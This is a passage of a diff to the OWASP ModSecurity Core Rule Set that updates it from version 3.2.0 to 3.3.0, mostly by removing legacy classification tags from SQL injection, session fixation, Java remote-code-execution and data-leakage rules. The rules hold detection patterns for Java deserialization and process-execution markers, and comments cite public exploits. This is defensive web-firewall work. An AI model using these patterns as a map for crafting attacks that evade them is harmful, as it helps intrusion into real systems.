setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1653,13 +1472,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1689,13 +1504,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'WARNING',\ setvar:'tx.anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1721,13 +1532,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'WARNING',\ setvar:'tx.anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" diff --git a/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf b/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf index 4bb7f4dec..29d950b6f 100644 --- a/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf +++ b/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -41,11 +41,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-fixation',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SESSION_FIXATION',\ - tag:'WASCTC/WASC-37',\ - tag:'CAPEC-61',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -65,11 +62,8 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio tag:'attack-fixation',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SESSION_FIXATION',\ - tag:'WASCTC/WASC-37',\ - tag:'CAPEC-61',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:Referer "@rx ^(?:ht|f)tps?://(.*?)\/" \ @@ -94,11 +88,8 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio tag:'attack-fixation',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SESSION_FIXATION',\ - tag:'WASCTC/WASC-37',\ - tag:'CAPEC-61',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule &REQUEST_HEADERS:Referer "@eq 0" \ diff --git a/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf b/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf index 9e93833db..46df4e125 100644 --- a/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf +++ b/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -43,12 +43,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'platform-multi',\ tag:'attack-rce',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -61,7 +58,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES # [ Java deserialization vulnerability/Oracle Weblogic (CVE-2017-10271) ] # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Generic rule to detect processbuilder or runtime calls, if any of thos is found and the same target contains +# Generic rule to detect processbuilder or runtime calls, if any of those is found and the same target contains # java. unmarshaller or base64data to trigger a potential payload execution # tested with https://www.exploit-db.com/exploits/42627/ and https://www.exploit-db.com/exploits/43458/ @@ -79,12 +76,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'platform-multi',\ tag:'attack-rce',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?:unmarshaller|base64data|java\.)" \ @@ -107,12 +101,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'platform-multi',\ tag:'attack-rce',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "@rx (?:runtime|processbuilder)" \ @@ -143,12 +134,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'platform-multi',\ tag:'attack-rce',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -184,12 +172,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'platform-multi',\ tag:'attack-rce',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -208,12 +193,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'platform-multi',\ tag:'attack-rce',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -232,12 +214,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'platform-multi',\ tag:'attack-rce',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -259,12 +238,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'platform-multi',\ tag:'attack-rce',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -297,12 +273,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'platform-multi',\ tag:'attack-rce',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\ - tag:'WASCTC/WASC-31',\ - tag:'OWASP_TOP_10/A1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" diff --git a/rules/REQUEST-949-BLOCKING-EVALUATION.conf b/rules/REQUEST-949-BLOCKING-EVALUATION.conf index f7e1ff21b..5f370a166 100644 --- a/rules/REQUEST-949-BLOCKING-EVALUATION.conf +++ b/rules/REQUEST-949-BLOCKING-EVALUATION.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -68,7 +68,7 @@ SecRule IP:REPUT_BLOCK_FLAG "@eq 1" \ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule TX:DO_REPUT_BLOCK "@eq 1" \ @@ -88,7 +88,7 @@ SecRule TX:ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-generic',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score=%{tx.anomaly_score}'" diff --git a/rules/RESPONSE-950-DATA-LEAKAGES.conf b/rules/RESPONSE-950-DATA-LEAKAGES.conf index 54d42f97e..59f681835 100644 --- a/rules/RESPONSE-950-DATA-LEAKAGES.conf +++ b/rules/RESPONSE-950-DATA-LEAKAGES.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -41,12 +41,9 @@ SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?Index of.*?Inde tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/INFO_DIRECTORY_LISTING',\ - tag:'WASCTC/WASC-13',\ - tag:'OWASP_TOP_10/A6',\ tag:'PCI/6.5.6',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -77,12 +74,9 @@ SecRule RESPONSE_BODY "@rx ^#\!\s?/" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_CGI',\ - tag:'WASCTC/WASC-13',\ - tag:'OWASP_TOP_10/A6',\ tag:'PCI/6.5.6',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -109,12 +103,10 @@ SecRule RESPONSE_STATUS "@rx ^5\d{2}$" \ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-disclosure',\ - tag:'WASCTC/WASC-13',\ - tag:'OWASP_TOP_10/A6',\ tag:'PCI/6.5.6',\ tag:'paranoia-level/2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.error_anomaly_score}'" diff --git a/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf b/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf index 5bc80276f..f9af78323 100644 --- a/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf +++ b/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -36,7 +36,7 @@ SecRule RESPONSE_BODY "@pmFromFile sql-errors.data" \ tag:'platform-multi',\ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.sql_error_match=1'" SecRule TX:sql_error_match "@eq 1" \ @@ -53,10 +53,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Microsoft\]\[ODBC Microsoft Access Driver\])" \ @@ -79,10 +77,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i:ORA-[0-9][0-9][0-9][0-9]|java\.sql\.SQLException|Oracle error|Oracle.*Driver|Warning.*oci_.*|Warning.*ora_.*)" \ @@ -105,10 +101,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i:DB2 SQL error:|\[IBM\]\[CLI Driver\]\[DB2/6000\]|CLI Driver.*DB2|DB2 SQL error|db2_\w+\()" \ @@ -131,10 +125,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i:\[DM_QUERY_E_SYNTAX\]|has occurred in the vicinity of:)" \ @@ -157,10 +149,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i)Dynamic SQL Error" \ @@ -184,10 +174,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i)Exception (?:condition )?\d+\. Transaction rollback\." \ @@ -210,10 +198,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i)org\.hsqldb\.jdbc" \ @@ -236,10 +222,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i:An illegal character has been found in the statement|com\.informix\.jdbc|Exception.*Informix)" \ @@ -263,10 +247,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i:Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver)" \ @@ -290,10 +272,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i:Warning: ibase_|Unexpected end of command in statement)" \ @@ -316,10 +296,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i:SQL error.*POS[0-9]+.*|Warning.*maxdb.*)" \ @@ -342,10 +320,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsoft\]\[ODBC SQL Server Driver\]|\[Macromedia\]\[SQLServer JDBC Driver\]|\[SqlException|System\.Data\.SqlClient\.SqlException|Unclosed quotation mark after the character string|'80040e14'|mssql_query\(\)|Microsoft OLE DB Provider for ODBC Drivers|Microsoft OLE DB Provider for SQL Server|Incorrect syntax near|Sintaxis incorrecta cerca de|Syntax error in string in query expression|Procedure or function .* expects parameter|Unclosed quotation mark before the character string|Syntax error .* in query expression|Data type mismatch in criteria expression\.|ADODB\.Field \(0x800A0BCD\)|the used select statements have different number of columns|OLE DB.*SQL Server|Warning.*mssql_.*|Driver.*SQL[ _-]*Server|SQL Server.*Driver|SQL Server.*[0-9a-fA-F]{8}|Exception.*\WSystem\.Data\.SqlClient\.)" \ @@ -368,10 +344,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid MySQL|Column count doesn't match value count at row|mysql_fetch_array\(\)|on MySQL result index|You have an error in your SQL syntax;|You have an error in your SQL syntax near|MySQL server version for the right syntax to use|\[MySQL\]\[ODBC|Column count doesn't match|Table '[^']+' doesn't exist|SQL syntax.*MySQL|Warning.*mysql_.*|valid MySQL result|MySqlClient\.)" \ @@ -394,10 +368,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i:PostgreSQL query failed:|pg_query\(\) \[:|pg_exec\(\) \[:|PostgreSQL.*ERROR|Warning.*pg_.*|valid PostgreSQL result|Npgsql\.|PG::[a-zA-Z]*Error|Supplied argument is not a valid PostgreSQL .*? resource|Unable to connect to PostgreSQL server)" \ @@ -420,10 +392,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i)(?:Warning.*sqlite_.*|Warning.*SQLite3::|SQLite/JDBCDriver|SQLite\.Exception|System\.Data\.SQLite\.SQLiteException)" \ @@ -446,10 +416,8 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\ - tag:'CWE-209',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ chain" SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.*sybase.*|Sybase.*Server message.*)" \ diff --git a/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf b/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf index ebba913bf..3926a5bf2 100644 --- a/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf +++ b/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -36,12 +36,9 @@ SecRule RESPONSE_BODY "@pmFromFile java-code-leakages.data" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_JAVA',\ - tag:'WASCTC/WASC-13',\ - tag:'OWASP_TOP_10/A6',\ tag:'PCI/6.5.6',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -65,12 +62,9 @@ SecRule RESPONSE_BODY "@pmFromFile java-errors.data" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_JAVA',\ - tag:'WASCTC/WASC-13',\ - tag:'OWASP_TOP_10/A6',\ tag:'PCI/6.5.6',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" diff --git a/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf b/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf index 1aaf5a484..b3afe491f 100644 --- a/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf +++ b/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set 